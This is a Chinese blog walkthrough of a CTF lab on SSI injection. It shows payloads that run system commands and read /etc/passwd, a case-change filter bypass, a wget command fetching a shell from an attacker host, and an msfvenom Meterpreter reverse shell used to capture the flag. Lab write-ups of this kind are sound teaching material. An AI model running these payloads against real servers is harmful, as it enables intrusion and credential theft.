ssi注入

最新推荐文章于 2024-06-26 17:30:04 发布
最新推荐文章于 2024-06-26 17:30:04 发布
阅读量494 收藏 1
点赞数
文章标签: 靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44832048/article/details/91620021
版权

 

ssi注入就是寻找一个输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令。

如 <!--#exec cmd="ls" --> <!--#exec cmd="cat /etc/passwd" --> 

切换目录<!--#exec cmd="cd /root/dir/" -->

 

像正常一样先ifconfig扫描出自己的IP,然后nmap -sV 攻击机IP 可以得到靶机的IP以及开放的端口及相关信息。

看到靶机开放了http服务的80端口,使用dirb探测敏感信息

然后通过robot.txt的链接,/spukcab/,

用它代替robot,txt得到两个文件index,bak     oldconfig.bak,下载下来用终端打开

得到一系列的代码文,不知道有没有用,把两个全cat下来。

除此之外还有

这个东西和SSI注入的格式一样,比较敏感,双引号里面是对应的Linux命令,通过这个命令我们能获得当前系统的用户名及其密码

 

接下来要用SSI注入漏洞

刚才我们尝试的链接,出现这个登陆的页面,我们打开,

把这个复制到target和feedback里        <--#exec cmd="cat/etc/passwd/"-->

也可以把execbiancheng 大写,

登录成功

出现的是我们刚才复制的Linux命令,

然后我们返回刚才登陆的页面,把feedback那一栏--前加个!得到

返回了etc文件的效果以及内容

下一步

下载shell脚本并重命名 <!--#exec cmd="wget http://ip/shell.txt | rename shell.txt shell.php" --> 

制作webshell:

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php


打开metasploit启动监听:

msfconsole

然后设置参数

设置完之后输入run

然后下载Python脚本,

并重命名为shell.php
<!--#exec cmd="wget http://ip/shell.txt | rename shell.txt shell.php" -->

即在登录页面输入,1    和上式

把shell.py移到/var/www/html/ 的根目录下

查看当前目录信息

 

开启apache服务,然后service apache status查看是否开启。

 

查看是否返回shell

 

刚才将L命令大小写转换绕过过滤机制,上传shell,反弹shell,

然后还要赋予shell.php权限 chomd 777 shell.php

 

执行shell后命令:sysinfo 查看系统信息 ;

shell 进去系统shell;发现和以前不太相同

 

python优化shell

优化后,

我们cd/root/

ls

cat flag

南吕十七
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之SSI注入
afei001
02-03 420
SSI注入攻击介绍     SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI注入漏洞来执行系统命令,并返回对应的结果。     如果在网站目录中发现了stm、shtm、shtml,并且网站对于ssi的输入没有做到严格过滤,很有可能被SSI注入攻击。 练习环境 攻击机:kali 靶机:Ubuntu 16.04.3 1. 发现靶机,并对端口进...
网络安全[脚本小子] -- SSI注入
Skycrab
10-01 7319
本系列文章将与大家一起学习探讨网络安全知识,但我们不做脚本小子。 在计算机和网络领域里,脚本小子(script kiddie)是一个贬义词用来描述以黑客自居并沾沾自喜的初学者。 他们钦慕于黑客的能力与探索精神,但与黑客所不同的是,脚本小子通常只是对计算机系统有基础了解与爱好, 但并不注重程序语言、算法、和数据结构的研究,虽然这些对于真正伟大的黑客来说是必须具备的素质。 他们常常从某些网站上复制脚本
CTF之Web安全SSI注入
小王的储物间
03-29 389
SSI(server side inject)的出现是为了赋予HTML静态页面动态的效果,通过SSI来执行系统命令;并返回对应的结果。如果再网站目录中发现了.stm;.shtm;.shtml;这样的文件后缀名,并且网站对于SSI的输入没有做到严格过滤或者过滤不充分;很有可能被SSI注入攻击。对于SSI漏洞服务器有很多过滤机制,需要进行绕过,比如大小写。防御措施:一、进行过滤,过滤这些语法中的特殊字符二、关闭服务器SSI相关功能。
SSI 注入漏洞
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
06-26 501
通过信息收集技术,了解我们的检测目标运行哪些类型的 Web 服务器,查看检测网站的内容来猜测是否支持 SSI,由于 .shtml 文件后缀名是用来表明网页文件是否包含 SSI 指令的,因此如果该网站使用了 .shtml 文件,那说明该网站支持 SSI 指令。在很多场景中,用户输入的内容可以显示在页面中,比如一个存在反射 XSS 漏洞的页面,如果输入的 payload 不是 XSS 代码而是 SSI 标签,服务器又开启了 SSI 支持的话就会存在 SSI 漏洞。SSI 具有强大的功能,只要使用一条简单的。
ssI注入
qq_44813849的博客
06-12 257
1.利用ifconfig命令扫到攻击机IP:192.168.174.128 然后用命令nmap 192.168.174.128/24扫到靶机IP:192.168.174.133 2.使用nmap -sV 192.168.174.133扫描主机服务信息以及服务版本 使用nmap -T4 -A -v 192.168.174.133快速扫描主机的详细信息 探测敏感信息nikto -host http...
SSI.zip_SSI_SSI Injection代码
09-22
SSI注入,即SSI Injection,是指攻击者通过输入恶意的SSI指令到应用程序中,来利用服务器的SSI功能,获取敏感信息或执行非法操作。这种漏洞常见于用户可控的数据被直接插入到包含SSI指令的页面中,例如评论、表单...
SSI漏洞注入
weixin_45007073的博客
01-04 929
在进行SSI漏洞注入之前,先介绍一下什么是SSI漏洞。 SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 准备工作 靶机地址: 链接:https://pan.baidu.com/s/1MTunDny-m5eICXAS9P8ugA 提取码:x3c2 漏洞复现过程 使用netdiscover发现存活主机 netdidscover -i eth0 使用n
CTF实验:SSI注入
floyd_art的博客
04-04 500
SSI注入攻击介绍 SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果。     如果在网站目录中发现了 .stm, .shtm .shtml,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击。 信息探测 扫描主机服务信息以及服务版本 – nmap -sV 靶场IP地址 快速扫描主机全部信息 –...
ssi注入详解
D1stiny的博客
05-22 1779
ssi是赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,若在网站目录中发现了.stm .shtm .shtml等,且对应SSL输入没有过滤,可能存在SSI注入漏洞 简单的说ssi注入就是寻找输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令 首先netdiscover -r 你的ip/24扫描得到靶场IP 用nmap进行扫描 用dirb进行扫描 发现了ssi,意识到可能是ssi注入 访问一下http://192.168.199.1
CTF-SSI注入攻击
Reaches_r的博客
08-06 520
前言:SSI介绍 SSl(server side inject)的出现是为了赋予html静态页面动态的效果,通过ssi来执行系统命令,并返回对应的结果。 如果在网站目录中发现了.stm, .shtm .shtml,并且网站对于ssi的输入没有做到严格过滤,很有可能被ssl注入攻击。 1.用dirb和nikto扫描,收集有用信息。很明显可以判断有ssi漏洞 2.看看这个index文件,是一个命令行,这时开始寻找注入点 3.发现首页有个可以输入的地方,feedback(反馈)肯定是个注入点..
SSI注入实战
qq_23347209的博客
05-28 1258
文章目录靶机环境一、服务器信息搜集二、网站信息搜集1.使用nikto扫描网站目录2.浏览网站三、SSI注入漏洞利用1、SSI注入简介:2、SSI注入测试网站四、利用nc反弹shell——失败五、使用msf框架1、python木马生成2、建立木马监听端3、上传木马文件到本地web服务器上4、构造SSI注入语句执行木马 靶机环境 靶机下载网站:https://www.vulnhub.com/ 使用Vmware虚拟机中NAT网络 靶机 192.168.146.150 攻击机 parrot 192.168.14
SSI注入 + [BJDCTF2020]EasySearch writeup
ShenZ的博客
09-08 319
SSI注入 全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 页面中有一小部分是动态输出的时候使用SSI,比如: 文件相关的属性字段 当前时间 访客IP 调用CGI程序 SSI语法 SHTML文件中使用SSI指令引用其他的html文件(#include),此时服务器会将SHTML中包含的SSI指令解释,再传送给客户端,此时的HTML中就不再有SSI指令了。 ①显示
代码审计后的SSI注入漏洞
qq_53142368的博客
11-19 3116
[BJDCTF2020]EasySearch 首先就是dirsearch扫描,用dirsearch的前提一定是前端看不到啥东西了,呢就不用猜,绝对有一些隐藏文件。 然后dirsearch就扫描出来了index;php.swp文件。。。 然后就看到了源码 进行代码审计 [<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#
浅析Apache中SSI和CGI的设定方法
tandyong的专栏
05-23 599
由于Apache具有相当高的可移植性,它支持超过30种操作系统,包括Unix、Windows 及Darwin等系统,所以目前在网络上已注册的网域里大部份是使用Apache网页服务器。目前ApacheSoftware Foundation 正致力于发展现在已进入alpha测试阶段的Apache2.0。在这里,我和大家探讨如何修改服务器选项让服务器能提供简单的动态网页内容,也就是支持 CGI程序及 S
Apache SSI 远程命令执行漏洞(SSI注入漏洞)
qq_45521281的博客
07-25 3104
SSI 服务器端包含 SSI(server-side includes)能帮我们实现什么功能: SSI提供了一种对现有HTML文档增加动态内容的方法,即在html中加入动态内容。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意命令。 在测试任意文件上传漏洞的时候,目标
SSI框架搭建与XML配置教程
在Java Web开发中,SSI框架是一种常见的组合,它将Struts2用于动作控制和视图呈现,Spring用于依赖注入和事务管理,而Ibatis则作为持久层框架处理数据库交互。以下是对这个框架组合的详细解释: 1. **Struts2**:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值